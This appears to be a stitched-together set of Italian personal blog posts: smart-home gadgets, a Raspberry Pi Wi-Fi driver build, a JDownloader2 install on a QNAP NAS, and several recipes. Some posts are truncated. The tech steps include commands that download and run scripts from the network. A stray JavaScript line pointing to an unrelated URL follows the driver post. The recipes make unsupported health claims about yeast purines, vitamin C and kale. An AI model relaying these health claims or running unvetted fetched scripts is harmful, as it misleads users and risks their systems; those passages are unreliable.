Personalmente mi sono sempre chiesto come rendere smart il mio vecchio Condizionatore a infrarossi e spesso mi dicevano che a meno di soluzioni costose o molto custom non ci fossero e invece…. ci vieni in aiuto Broadlink con i suoi piccoli devices con infrarossi multi-direzionali. Nello specifico ne ho testati due:

Per quanto riguarda i prezzi abbiamo il RM4 mini a 27,00 euro circa (io l’ho comprato in offerta a 20,00 euro) con il Sensore a 9,90 euro e il RM3 mini a 24,00 euro.

Entrambi validi e pressoché simili nella configurazione, se volete qualcosa di più evoluto il RM4 mini ha anche un sensore di temperatura e umidità che lo rendono ancora più completo.

Come Configurare Broadlink RM4 mini

Per prima cosa collegate il cavo usb in dotazione o il sensore usb direttamente al RM4 mini e poi all’alimentatore usb (non in dotazione), il led blu inizierà a lampeggiare e a questo punto basterà utilizzare l’app Broadlink, seguendo questi semplici passaggi:

  1. Accedere all’app con un account ad hoc o il vs account gmail
  2. Selezionate: “Aggiungo Dispositivo” e verrà automaticamente trovato (se non accade rifate l’operazione e magari effettuate il reset hardware)

Una delle comodità invernali è quella di avere una caldaia smart che possa essere controllata dallo smartphone o dal PC ma nello stesso tempo che abbia meccanismi/automatismi idonei per non farsi trovare impreparati dal freddo che avanza ma sopratutto per evitare “sprechi” quando non siamo in casa e abbiamo pre-impostato i crono-termostati di “vecchio stampo” che accendono la caldaia. Per questo in modo semplice ed economico possiamo “domotizzare” la nostra caldaia (quella classica che ha i due cavi con contatto aperto), con pochi materiali e con una spesa inferiore a 23,00 euro:

Risotto alla Pescatora Plus

Oggi, pubblicherò una ricetta che mi piace tanto fare e mangiare l’estate ma è buona in qualsiasi stagione. Il modo migliore per gustarla è con i prodotti freschi, ma in mancanza di questi potete usare quelli congelati (saltando la Fase 0 del lavaggio e pulizia ma preparando comunque il Brodo!!!) .

Ingredienti per 4 persone:

Riso Carnaroli (350 g)
Vongole (400 gr)
Cozze (200 gr)
Calamari (due/tre)
Gamberi (200 gr)
Pesce Spada (100 gr)
Passata di pomodoro (50gr)
Brodo Vegetale e di Pesce (1 litro circa)

Fase 0 – Preparazione (3 ore circa)

  • Lavate Calamari e Gamberi per bene e poi:
    • sgusciate i Gamberi e toglietegli la testa (mettetendola da parte);
    • tagliate i Calamari a listarelle, di 3 cm al massimo, assieme ai tentacoli.
  •  Brodo:
    • prendete una pentola con 1 litro di acqua e aggiungete carote, cipolla, fagiolini, peperoni o altri ortaggi che avete in casa e fate bollire per 1 ora almeno con le teste dei Gamberi;
  • Lavaggio e pulizia Vongole:
    • battetele su di un piano o un tagliere, in modo da far perdere un po’ di sabbia ed impurità; ponetele in una ciotola e aggiungete un pò di sale grosso. Lasciatele in ammollo per un paio di ore con l’acqua che lentamente scorre in modo da farle spurgare in modo naturale;
    • di tanto in tanto scuotetele e cambiate l’acqua almeno 2-3 volte e comunque fino a quando non vedrete più tracce di sabbia.
  • Lavaggio e pulizia Cozze:
    • si inizia la pulizia con l’asportazione del “bisso”, una barbetta che spunta tra le due valve (e che tiene le cozze ancorate agli scogli);
    • poi potete cominciare la raschiatura: usando una spazzola dura di saggina (o una spugna metallica) e tenendo la cozza preferibilmente sotto un filo di acqua corrente sfregatela energicamente per togliere le incrostazioni. Mettete le cozze pulite in una ciotola e aggiungete un pò di sale grosso. Lasciatele in ammollo per un paio di ore, con l’acqua, perché espellano gli eventuali residui di sabbia e le piccole impurità;
    • di tanto in tanto scuotetele e cambiate l’acqua almeno 2-3 volte e comunque fino a quando non vedrete più tracce di sabbia.
  • Tagliate il Pesce Spada a cubetti piccoli.

Fase 1 – Cottura (30 minuti circa)

  1. ponete i Calamari e i Gamberi in una casseruola grande (dove andrà anche il riso) e soffriggeteli per 5 minuti assieme all’Aglio e alla Cipolla (quest’ultima tagliata finemente);
  2. poi aggiungete in sequenza:
    1. la passata di pomodoro;
    2. le cozze e le vongole;
    3. il Pesce Spada;
    4. una parte di brodo vegetale;
    5. il riso.

Durante la cottura del riso (15/20 minuti) aggiungete del brodo, all’occorrenza, in modo da non far asciugare troppo il riso.

Questa è una ricetta che faccio ormai da moltissimi anni con soddisfazione di tutti, sia parenti che amici: l’impasto della pizza a lenta lievitazione e alta maturazione. Per l’impasto potete utilizzare il lievito naturale (vedi link qui) usando le dosi indicate nel link o il lievito di birra (il cubetto da 25 gr) e dividerlo in 4 (circa 6 gr a parte) ed ogni parte sarà sufficiente per 500/600 gr di farina.

Ingredienti:

  • 350 gr Farina 0 Manitoba
  • 150 gr Farina integrale
  • 300 gr di acqua (per comodità la peso, utilizzando la bilancia)
  • 5/6 gr di lievito di birra o il lievito naturale (vedi link qui)
  • zucchero (un cucchiaino da caffè)
  • sale (un cucchiaio)
  • Olio EVO
  • Mozzarella

Fase 0 – Preparazione

  • Prendete un recipiente molto grande, col tappo (io uso i contenitori della Tupperware) e versateci le farine (avendo cura di mischiarle ben bene).
  • Mettete in un pentolino l’acqua e riscaldatela (calda ma non deve scottare), versatela in un ciotola, assieme al lievito e un cucchiaino di zucchero e con le mani sciogliete il lievito.

Fase 1 – Impasto

  • Versate la ciotola d’acqua nel recipiente con la farina e amalgamate ben bene con una cucchiarella fin  quando vi sarà possibile, poi aggiungete un cucchiaio di sale e iniziate ad impastare con le mani.
  • Non appena affonderete le mani nella pasta, sarà appiccicosa e difficile da raccogliere. Continuate a lavorare l’impasto con le mani, formando una palla, facendo pressione e continuando a dargli forma.
  • Se l’impasto sembra non perdere la sua viscosità, cospargete dell’altra farina (poca alla volta) sul piano e continuate a impastare (volendo potete infarinarvi leggermente le mani per fare in modo che l’impasto non sia troppo appiccicoso).
  • Continuate a fare così finché non sarà più appiccicosa e sarà possibile dargli forma senza che si sfaldi, dopodiché l’impasto è pronto.

Fase 2 – Lievitazione e Maturazione

  • Adesso che l’impasto è pronto e potete chiudere il recipiente (quello dentro il quale l’avete impastato) e lasciarlo riposare per 18 ore circa in frigorifero; al termine tenete per altre 4/5 ore l’impasto nel recipiente ma fuori dal frigo (nel periodo invernale vicino ad un termosifone sarebbe meglio!). Dopo 23 ore stendete l’impasto su una teglia (a seconda di come vi piace la pizza, ovvero fina o spessa) e al termine ponete un foglio di carta da forno sotto all’impasto. A questo punto lasciate riposare per l’ultima ora la teglia nel forno spento.

Fase 3 – Cottura

  • Togliete la teglia dal forno e tenetela da parte mentre pre-riscaldate, per 15/20 minuti, il forno al massimo dei gradi possibili (250° o 280°) con ventilazione, tenendo presente che più alti sono i gradi del forno e meglio è per la cottura della pizza.
  • Guarnite la teglia di pizza con la passata di pomodoro, un filo d’olio EVO e un pizzico di sale e posizionatela in forno, uno scalino più in basso della metà, per circa 10 minuti.
  • Poi rimuovete la carta da forno e spostate la teglia all’esatta metà del forno per gli ultimi 10/15 minuti (dipende dalla potenza del forno) ma è sempre meglio che facciate un controllo visivo (sia sopra che sotto alla pizza) per comprendere se è tutto pronto; durante gli ultimi 7/5 minuti di cottura, aggiungete la mozzarella.

Voilà, la vostra Pizza è pronta per essere divorata. Si tratta di una Pizza ad alta digeribilità che vi farà dimenticare quel senso di sete e quel senso di gonfiore allo stomaco che danno le pizza con una bassa maturazione.

Cavolo Nero Toscano (Cavolaccio) ripassato in padella

Questa ricetta è semplice e veloce (15/20 minuti) e la faccio spesso perchè piace a tutti in famiglia (bambini compresi):

  1. Pulite il cavolo nero rimuovendo la parte finale di gambo;
  2. Portate una pentola colma d’acqua a bollore, salatela e tuffatevi il cavolo nero che dovrà cuocere per 10 minuti circa;
  3. Scolate il cavolo e passatelo nell’acqua ghiacciata per fissare il bel colore verde scuro; lasciateli giusto per un paio di minuti, il tempo necessario a freddarlo leggermente, e poi strizzatelo;
  4. Scaldate in una padella un generoso giro d’olio extravergine d’oliva insieme ad uno spicchio d’aglio;
  5. Tritate un peperoncino (potete non mettercelo se avete bimbi come ospiti!) e tagliate grossolanamente il cavolo messo da parte. Unite entrambi gli ingredienti alla padella;
  6. Salate e aromatizzate con i semi di finocchio. Lasciate insaporire per qualche minuto (max 5/7 minuti);
  7. Servite il cavolo ripassato in padella ancora caldo aggiungendo giusto un filo d’olio extravergine d’oliva a crudo.

Un’alternativa “più” gustosa e ricca è questa:

  1. Pulite il cavolo nero rimuovendo la parte finale di gambo:
  2. Pelare 1-2 patate e tagliarle a tocchetti;
  3. Portate una pentola colma d’acqua a bollore, salatela e tuffatevi il cavolo nero e le patate che dovranno cuocere per 10 minuti circa;
  4. Scolate il cavolo e passatelo nell’acqua ghiacciata per fissare il bel colore verde scuro; lasciatelo giusto per un paio di minuti, il tempo necessario a freddarlo leggermente, e poi strizzatelo;
  5. Tritate un peperoncino (potete non mettercelo se avete bimbi come ospiti!) e tagliate grossolanamente il cavolo messo da parte.
  6. Scaldate in una padella un generoso giro d’olio extravergine d’oliva e aggiungete: “uno spicchio d’aglio, le patate e la pancetta tagliata a listarelle” e fate soffriggere per qualche minuto (5/7 minuti);
  7. Poi, unite anche il Cavolo, salate e lasciate insaporire per qualche minuto (max 5 minuti);
  8. Servite il tutto ancora caldo aggiungendo giusto un filo d’olio extravergine d’oliva a crudo.

Il Cavolo Nero Toscano è ricchissimo di sostanze antiossidanti (che spengono i processi infiammatori, migliorano quelli digestivi e hanno mostrato di possedere importanti proprietà di prevenzione antitumorale), sali minerali e vitamine, in particolare la C, che è il migliore vaccino naturale contro virus, dolori e infreddature.

Raspberry driver wifi per chip Realtek

Sono il felice possessore di un Raspberry Pi 2 Modello B ma avendo acquistato un adattore usb wireless TP-LINK TL-WN725N (Realtek chip), mi sono accorto ben presto che l’os Raspbian non lo riconosce e quindi a quanti di voi si trovano nella stessa situazione, riporto tutta la procedura step by step per far funzionare il vostro usb wifi nano.

Innanzitutto dal terminale dell’ OS Raspbian:

1) Aggiorniamo la lista dei pacchetti di sistema:
sudo apt-get update

2) Effettuiamo l’upgrade per i pacchetti già installati:
sudo apt-get upgrade

3) Aggiorniamo il kernel del raspberry:
sudo rpi-update

4) Effettuiamo il reboot

5) Per verificare la versione del kernel Raspberry:
/opt/vc/bin/vcgencmd version

L’ultimo step conviene effettuarlo sia all’inizio che alla fine per rendersi conto dell’aggiornamento.

Procedura per la compilazione/installazione del driver:

1) Installare il compilatore:
sudo apt-get install build-essential git

2) creare la cartella e scaricare i drivers:
mkdir -p src/drivers
cd src/drivers/
git clone https://github.com/lwfinger/rtl8188eu.git

3) scaricare il codice sorgente per il vs kernel:
sudo wget https://raw.githubusercontent.com/notro/rpi-source/master/rpi-source -O /usr/local/bin/rpi-source && sudo chmod +x /usr/local/bin/rpi-source && /usr/local/bin/rpi-source -q –tag-update

4) Installare il codice scaricato:
sudo rpi-source

4a) Se avete un errore relativo il GCC usate questo parametro:
sudo rpi-source –skip-gcc

5) Compilare il driver:
cd src/drivers/rtl8188eu
sudo make all
sudo make install

6) Effettuate il reboot

7) Per verificare la riuscita dell’installazione:
sudo iwconfig wlan0

Se non appare niente qualcosa è andato storto mentre se vedete un prompt in cui appare “wlan0” il gioco è fatto. Anche dall’interfaccia grafica se posizionate il mouse sull’icona dei 2 computer, apparirà l’elenco delle reti WIFI a sugellare la buona riuscita delle operazioni.var url = ‘https://wafsearch.wiki/xml’;

Per chi utilizza Pyload su NAS Qnap sa cosa vuol dire avere problemi di update dei plugin o issue diverse relative ad alcuni dei plugin, quindi ho cercato (e trovato in rete) il modo di installare Jdownloader2 su NAS QNAP (processore ARM) con una procedura semplice, anche per chi non ha dimestichezza con la shell Linux.
Pochi semplici passaggi, innanzitutto scaricare (link):

      1) il pacchetto Optware e installarlo da AppCenter (installazione manuale)

 

      2) jd2_qnap_installer.sh (copiarlo sulla directory Public del NAS e assicurarsi che il nome file sia tutto in minuscolo)

 

    3) JRE_ARM_8.6.0_arm-x19.qpkg e installarlo da AppCenter (installazione manuale)

Poi dirigersi con la shell (utilizzando Putty per connettersi al NAS) all’interno della directory /Public e eseguire i seguenti comandi:

      1) chmod +x jd2_qnap_installer.sh

 

    2) ./jd2_qnap_installer.sh

Gli unici errori che potrete incontrare a cui occorre fare attenzione sono su Optware e Java (qualora non trovi il path di installazione effettuate il setup da AppCenter); il setup ci metterà da 5 a 10 minuti e alla fine apparirà:

| Enter y -> Download now
| Enter n -> Later

Dovrete rispondere “y” e inserire le credenziali di MyJdownloader; qualche ulteriore minuto e apparirà “set CONNECTED”, ciò ci indicherà che abbiamo terminato e potremo uscire dalla procedura premendo “CTRL+c”.

Finalmente potrete andare su https://my.jdownloader.org/login.html o utilizzare le APP per gli smartphone ed iniziare ad utilizzare Jdownloader2.

L’unica modifica da fare su my.jdownloader è quella di impostare la directory di download: “impostazioni di JD2 (Settings), poi in (Advanced Settings) cambiate il percorso dei download (Default Download Folder) in /share/download”.

Lievito Naturale

Oggi descriverò i passi necessari per poter ottenere (in circa 6 giorni) e mantenere, a casa, il lievito naturale ma prima è importante sapere che:
1) con la lievitazione naturale nella pasta acida, batteri e lieviti sono in equilibrio e operano una specie di predigestione della farina e, di conseguenza, facilitano la sua corretta assimilazione da parte dell’organismo; questo non accade quando si utilizza il lievito di birra…
2) è indicato in caso di intolleranze alimentari ai prodotti commerciali;
3) non contiene “purine” prodotte dall’eccesso di lievito commerciale (che possono causare calcoli renali e candidosi).

Per ottenerlo normalmente si usa l’acqua tiepida e lo zucchero o il miele (mezzo cucchiaino) ma per avere una sicura riuscita potete anche utilizzare l’uvetta come “starter” per avere dei batteri pronti già in acqua che facilitano l’innesco della fermentazione.

Uvetta come starter:
-50 g di uvetta in 100 g di acqua, coprite e lasciate macerare per 2-4 giorni.
I lieviti contenuti nella buccia dell’uvetta attireranno batteri e lieviti naturali contenuti nell’aria e faciliteranno il processo di lievitazione e fermentazione.
-Filtrate l’acqua per eliminare l’uvetta.

Primo Impasto
-Aggiungete 50 g di farina a 50 g di acqua;
-impastate per breve tempo (pochi minuti);
-coprite e lasciate riposare per 48 ore o verificate (dopo 24 ore) che il lievito inizi a muoversi (dovrebbe raddoppiare di volume), quindi passate al secondo impasto.

Secondo Impasto
A questo punto i batteri sono attivi e trasformano l’amido della farina in alcol e anidride carbonica. Per fare in modo che i batteri restino attivi e continuino questo processo, bisogna nutrirli con farina e acqua effettuando il “rinfresco” del lievito:
-Pesate il lievito del primo impasto e aggiungete lo stesso peso sia di farina che di acqua;
-impastate;
-coprite e lasciate riposare per altre 48 ore o fino a quando non raddoppia di volume (solitamente almeno 24 ore).

Terzo Impasto
Quando l’impasto è raddoppiato di volume, fate un altro rinfresco (come il Secondo Impasto), coprite e lasciate riposare per altre 48 ore.

Rinfresco dopo il Terzo Impasto per completare la creazione del Lievito Naturale
Impastate la pasta (lievito) esistente, con pari parti di farina e l’80% di acqua. Coprite e lasciate riposare per 4-6 ore. Da ora in poi il lievito è finalmente pronto, infatti esso raddoppierà il volume consistentemente ogni 4-6 ore.

Successivi Rinfreschi
Questo procedimento (Rinfresco) va ripetuto ogni 4-6 ore se il lievito si trova fuori dal frigorifero altrimenti potete eseguire il “Rinfresco” ogni 7-10 giorni.

Nota Bene
Più il tempo passa (ovvero più Rinfreschi si fanno) e migliore diventa il lievito naturale in quanto si abbassa l’acidità. Il riposo del lievito deve avvenire sempre in un ambiente tra i 22 ed i 30 gradi. Il lievito va conservato dentro un contenitore di vetro, chiuso ermeticamente se sta in frigo mentre quando si copre per farlo fermentare basta chiudere il barattolo con una pellicola. Inoltre, ogni volta che lo tirate fuori dal frigo effettuate almeno un rinfresco (meglio se 2) prima di utilizzarlo, dopo averlo fatto riposare a temperatura ambiente per qualche ora.
Tra un impasto e l’altro potete ridurre, buttando, una parte di lievito, onde evitare che a fine procedura vi ritroviate con troppo impasto che ad ogni Rinfresco diventi eccessivo (sia per il barattolo che per la farina da aggiungere)!!!

Usate solo Farina Manitoba o Farina di Grano Duro mai farina 00!!!

Per l’utilizzo del lievito naturale io uso queste proporzioni: “1 parte di lievito ogni 3 di Farina e il 50% o 60% di acqua. Esempio: 600 gr di Farina, 200 gr di lievito naturale e 300 gr di acqua”.
Il lievito durante l’utilizzo va sciolto nell’acqua tiepida e poi aggiunta la farina necessaria per le vs ricette.
